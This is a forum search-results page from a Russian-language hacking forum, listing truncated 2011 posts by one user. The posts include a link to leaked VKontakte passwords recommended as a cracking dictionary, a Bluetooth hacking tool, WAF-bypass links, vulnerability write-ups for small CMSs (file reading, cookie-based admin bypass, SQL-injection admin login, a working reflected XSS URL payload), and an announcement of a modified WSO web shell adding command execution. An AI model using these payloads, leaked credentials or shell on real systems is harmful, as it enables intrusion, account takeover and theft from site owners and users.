Вернуться   RDot > Поиск по форуму

Показано с 1 по 21 из 21.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Krist
Раздел: Беспроводные технологии/Wireless 04.06.2011, 22:54
Ответов: 8
Просмотров: 15,231
Автор Krist
Super Bluetooth Hack v1.07 by Candy symbian...

Super Bluetooth Hack v1.07 by Candy
symbian 7-8
http://cdn.mobiclue.com/wp-content/uploads/blogger/126-Download%2BSuper%2BBluetooth%2Bhack%2B1.8.jpg
Может очень многое но все зависит от...
Раздел: Оффтоп/Offtopic 21.02.2011, 16:16
Ответов: 18
Просмотров: 8,039
Автор Krist
Не свою) кстати там походу на все тесты код...

Не свою)
кстати там походу на все тесты код 11111
Раздел: Оффтоп/Offtopic 20.02.2011, 23:07
Ответов: 18
Просмотров: 8,039
Автор Krist
Mohze,ctacok - мне просто смешно читать ваши...

Mohze,ctacok - мне просто смешно читать ваши посты. Жгите еще.
Раздел: Оффтоп/Offtopic 20.02.2011, 19:53
Ответов: 18
Просмотров: 8,039
Автор Krist
Секретный архив КГБ lol

Зашел на зайцев.нет и увидел рекламу 'Секретный архив КГБ - узнай все о своей фамилии'
Перешел по ссылке - http://clubtest.info/familiya/
Ввел фамилию, номер мобилы(не свой конечно же, а набор...
Раздел: Web-среда/Web-applications 18.02.2011, 22:20
Ответов: 3,616
Просмотров: 1,920,127
Автор Krist
Просто там стоит WAF (web aplication firewall) ...

Просто там стоит WAF (web aplication firewall)
Ссылки как обходить их:
http://raz0r.name/obzory/novye-sposoby-obxoda-waf-i-php-eksploity/...
Раздел: Криптография/Cryptography 14.02.2011, 22:19
Ответов: 42
Просмотров: 69,240
Автор Krist
Пароли с vkontake ...

Пароли с vkontake
http://www.megaupload.com/?d=BMTNHTKX ~128k

Очень рекомендую использовать в качестве словаря логины от мыльников и от форумов. Пробив очень большой

Логины от мыл контакта...
Раздел: Уязвимости PHP/PHP vulnerabilities 14.02.2011, 11:26
Ответов: 3
Просмотров: 6,380
Автор Krist
Забыл написать: include() на лине нормально...

Забыл написать: include() на лине нормально воспринимает пути с несуществующими папками.
Раздел: Уязвимости PHP/PHP vulnerabilities 13.02.2011, 23:25
Ответов: 3
Просмотров: 6,380
Автор Krist
Question Особенность realpath();

Вот код одного движка
$gape = $_GET['page'];
if(file_exists('data/pages/page_'.$page.'.dat'))
{
$content = @file_get_contents('data/pages/page_'.$page.'.dat');
...

page = 123 - ok
page =...
Раздел: Сценарии/CMF/СMS 11.02.2011, 23:42
Ответов: 2
Просмотров: 3,979
Автор Krist
$filename = sanitize($filename); вот отличие...

$filename = sanitize($filename);
вот отличие версии 0.7.2 от 0.6.* в данном случаи - тоесть появилаь защита и я показал как её обойти
твой пост я видел и всегда смотрю искались ли баги в кмске до...
Раздел: Сценарии/CMF/СMS 11.02.2011, 15:03
Ответов: 2
Просмотров: 3,979
Автор Krist
Kure CMS v 0.7.1

KureCMS - http://code.google.com/p/kure/downloads/list
DORK: powered by kure

Читалка файлов

index.php
elseif(isset($_GET['post']) || isset($_GET['doc'])) { // if a post/doc has been requested...
Раздел: Сценарии/CMF/СMS 09.02.2011, 22:16
Ответов: 0
Просмотров: 3,066
Автор Krist
Cmscode

Cmscode - http://cmscode.ru
Текущая версия - 0.0.3


Заходим в админку не зная пароля
register_globals=on
/admin/auth.php

// ...
if(isset($_COOKIE['name']) & isset($_COOKIE['pass']))
Раздел: Web-среда/Web-applications 08.02.2011, 20:30
Ответов: 3,616
Просмотров: 1,920,127
Автор Krist
0x.... - это hex число - вот оно и...

0x.... - это hex число - вот оно и пропускаеться.
http://php.net/manual/en/function.is-numeric.php почитай + очень интересные коменты про максимальную длинну аргумента для этой функции
Раздел: Сценарии/CMF/СMS 07.02.2011, 20:58
Ответов: 1
Просмотров: 4,260
Автор Krist
CamanCMS

CamanCMS


sql-inj (Заходим под админом)
login.php

// ...
if($_GET["do"] == "login")
{
$login = htmlspecialchars($_POST["login"]);
Раздел: Сценарии/CMF/СMS 03.02.2011, 20:26
Ответов: 0
Просмотров: 3,064
Автор Krist
LinkorCMS

LinkorCMS - linkorcms.ru
Текущая версия: 1.3.4


Пассивная XSS

index.php?name=search&op=search&searchstr="><script>alert(1)</script><a href=

в конце <a href потому что дальше идут " и...
Раздел: Сценарии/CMF/СMS 03.02.2011, 17:44
Ответов: 19
Просмотров: 11,931
Автор Krist
admin.php //авторизуемся $ret=''; ...

admin.php

//авторизуемся
$ret='';
include("user/loginpas");//Достали две переменные my_login, my_pass



нужны права админа.
Раздел: Сценарии/CMF/СMS 03.02.2011, 16:21
Ответов: 19
Просмотров: 11,931
Автор Krist
Cms-diyan

Офсайт: http://cms-diyan.ru
Админка cms/admin.php
Пароль админа храниться в cms/user/loginpass
Пассиваня XSS
index.php

if (isset($_GET["img"])) $ret=vizov_img($_GET['img']);
...
Раздел: Оффтоп/Offtopic 03.02.2011, 15:08
Ответов: 8
Просмотров: 4,486
Автор Krist
Мда.. вот как оказывается надо было. Изучу в...

Мда.. вот как оказывается надо было. Изучу в ближайшее время темку про blind injection более подробно.
Ждем новых интересных заданий.
А salt я и не искал т.к

про salt не сказано. я знаю что к...
Раздел: Оффтоп/Offtopic 01.02.2011, 21:33
Ответов: 26
Просмотров: 12,745
Автор Krist
Мой шелл полностью соответствует всо самой новой...

Мой шелл полностью соответствует всо самой новой версии. я нкого не застовляю. пусть кто хочет - тот и юзает.
меня год не было? О.о! это меня тут не было. в других местах отсиживался. гыгы.

ок....
Раздел: Оффтоп/Offtopic 01.02.2011, 16:53
Ответов: 26
Просмотров: 12,745
Автор Krist
Когда t ==2 то инпут не показывается. Как...

Когда t ==2 то инпут не показывается. Как передать пас? Через спец софт послать переменную с паролем постом и все.
Раздел: Оффтоп/Offtopic 01.02.2011, 16:24
Ответов: 26
Просмотров: 12,745
Автор Krist
2.3 кажеться . Потом выравнил до последней версии...

2.3 кажеться . Потом выравнил до последней версии wso
Раздел: Оффтоп/Offtopic 01.02.2011, 16:10
Ответов: 26
Просмотров: 12,745
Автор Krist
WSO Krist_ALL edition

WSO Krist_ALL edition v 1.1

Модифицированный шелл wso.
v 1.1
[+] Добавлено выполнение команды через proc_open
[+] Поиск шелов по ключевым словам.
[+] В разделе INFO добавлено fdisk -l
[+]...
Показано с 1 по 21 из 21.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot